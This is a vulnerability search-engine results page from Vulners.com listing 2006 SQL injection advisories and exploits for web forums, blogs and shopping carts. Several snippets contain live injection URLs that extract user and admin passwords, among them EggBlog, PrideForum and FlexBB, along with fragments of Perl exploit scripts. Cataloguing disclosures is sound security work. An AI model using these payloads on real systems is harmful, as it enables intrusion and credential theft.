CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

3965 matches found

securityvulns•added 2006/05/30 12:0 a.m.•36 views

CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability

Software: CosmicShoppingCart www.cosmicphp.com Risk: Medium Discovered by: Vympel Marcelo Almeida Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. SQL injections have been found, they could be exploited by users to retrieve the...

securityvulns•added 2006/05/30 12:0 a.m.•31 views

Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.

--Security Report-- Advisory: ASPSitem = 2.0 Multiple Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 08:26 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: ASPSitem http://www.aspsitem.com Version: 2.0 a...

seebug.org•added 2006/05/28 12:0 a.m.•20 views

Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities

No description provided by source. Enigma Haber = 4.3 Multiple Remote SQL Injection Vulnerabilities Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on Enigma Haber = 4.3 Original advisory can be found at: http://www.nukedx.com/?viewdoc=34...

0day.today•added 2006/05/28 12:0 a.m.•46 views

CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ================================================================== CosmicShoppingCart search.php Remote SQL Injection Vulnerability ================================================================== Software: CosmicShoppingCart...

Exploit DB•added 2006/05/28 12:0 a.m.•37 views

EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation

http://site/EggBlog/rss/posts.php?id=1'//UNION//SELECT//0,concat'Username:%20',username,concat'Password:%20',password//from//eggblogmembers/ This SQL injection will list you all users and passwords. -- Eggblog 2.x Remote Privilege Escalation .xpl font-family:tahoma; font-size:11px; text-decoratio...

exploitpack•added 2006/05/27 12:0 a.m.•16 views

PrideForum 1.0 - forum.asp SQL Injection

PrideForum 1.0 - forum.asp SQL Injection Title : PrideForum 1.0 forum.asp Remote SQL Injection Vulnerability Author : ajann Exploit Example: http://target/path/forum.asp?HID=1%20union+select+0,0,ID,JUser,0,0,0,JPass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt milw0rm.com 2006-05-27...

seebug.org•added 2006/05/27 12:0 a.m.•11 views

PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability

No description provided by source. Title : PrideForum 1.0 forum.asp Remote SQL Injection Vulnerability Author : ajann Exploit Example: http://target/path/forum.asp?HID=1%20union+select+0,0,ID,JUser,0,0,0,JPass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt milw0rm.com 2006-05-27...

0day.today•added 2006/05/27 12:0 a.m.•84 views

PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ============================================================= PrideForum 1.0 forum.asp Remote SQL Injection Vulnerability ============================================================= Title : PrideForum 1.0 forum.asp Remote SQL Injection...

Exploit DB•added 2006/05/27 12:0 a.m.•26 views

PrideForum 1.0 - 'forum.asp' SQL Injection

Title : PrideForum 1.0 forum.asp Remote SQL Injection Vulnerability Author : ajann Exploit Example: http://target/path/forum.asp?HID=1%20union+select+0,0,ID,JUser,0,0,0,JPass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt milw0rm.com 2006-05-27...

seebug.org•added 2006/05/15 12:0 a.m.•13 views

DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)

No description provided by source. !/usr/bin/perl use IO::Socket; print q DeluxeBB 1.06 Remote SQL Injection Exploit exploit discovered and coded by KingOfSka http://contropotere.netsons.org ; if !$ARGV2 print q Usage: perl dbbxpl.pl host /directory/ victimuserid perl dbbxpl.pl www.somesite.com...

0day.today•added 2006/05/15 12:0 a.m.•28 views

DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)

Exploit for unknown platform in category web applications ============================================================= DeluxeBB SERVER: $server\r\n"; print " DIR: $dir\r\n"; print " USERID: $user\r\n"; print...

seebug.org•added 2006/05/06 12:0 a.m.•279 views

VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection Vulnerability

No description provided by source. VP-ASP 6.00 SQL Injection / Exploit by [email protected] people claimed there is some underground sploit for vp-asp 6.00 and I was sure that if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ well it didn't take me mor...

0day.today•added 2006/05/05 12:0 a.m.•42 views

Limbo CMS <= 1.0.4.2 (catid) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================================= Limbo CMS i Limbo CMS option=weblinks sql injection exploit i coded by Oo Usage: ?host=hostname&path=limbopath&id=userid Exemple: ?host=127.0.0.1&path=/limbo&id=1 g Google:...

Packet Storm•added 2006/05/02 12:0 a.m.•23 views

invision215.txt

Invision Power Board v2.1.5 Remote SQL Injection Filename :- funcmod.php Functionname :- postdelete Lines :- 89 To 209 Bug Found By :- Devil-00 Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^ www.securtygurus.net Code if isarray $id if count$id 0 $pid = " IN".implode",",$id.""; else return FALSE;...

securityvulns•added 2006/05/02 12:0 a.m.•49 views

Invision Power Board v2.1.5 Remote SQL Injection

Invision Power Board v2.1.5 Remote SQL Injection Filename :- funcmod.php Functionname :- postdelete Lines :- 89 To 209 Bug Found By :- Devil-00 Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^ www.securtygurus.net Code if isarray $id if count$id 0 $pid = " IN".implode",",$id.""; else return FALSE;...

securityvulns•added 2006/04/30 12:0 a.m.•42 views

MaxTrade sql inj.

MaxTrade sql inj. Vuln. discovered by : r0t Date: 30 april 2006 vendorlink:http://avalonbg.com/ensoft.html affected versions:1.0.1 and prior orginal advisory:http://pridels.blogspot.com/2006/04/maxtrade-sql-inj.html Vuln. Description: MaxTrade contains a flaw that allows a remote sql injection...

Packet Storm•added 2006/04/28 12:0 a.m.•19 views

FlexBB0.5.5.pl.txt

!/usr/bin/perl use IO::Socket; FlexBB Exploit function/showprofile.php Remote SQL Injection 1- First Do Login 2- View This Link :D index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbbusers WHERE id=1/...

seebug.org•added 2006/04/24 12:0 a.m.•12 views

BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability

No description provided by source. BK Forum = 4.0 Remote SQL Injection by n0m3rcy Copyright c 2006 n0m3rcy [email protected] Exploit: First you must be logged in Then type this in your browser...

0day.today•added 2006/04/24 12:0 a.m.•91 views

BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications =============================================================== BK Forum = 4.0 member.asp Remote SQL Injection Vulnerability =============================================================== BK Forum = 4.0 Remote SQL Injection by n0m3rcy...

seebug.org•added 2006/04/24 12:0 a.m.•21 views

FlexBB <= 0.5.5 (function/showprofile.php) SQL Injection Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; FlexBB Exploit function/showprofile.php Remote SQL Injection 1- First Do Login 2- View This Link :D index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by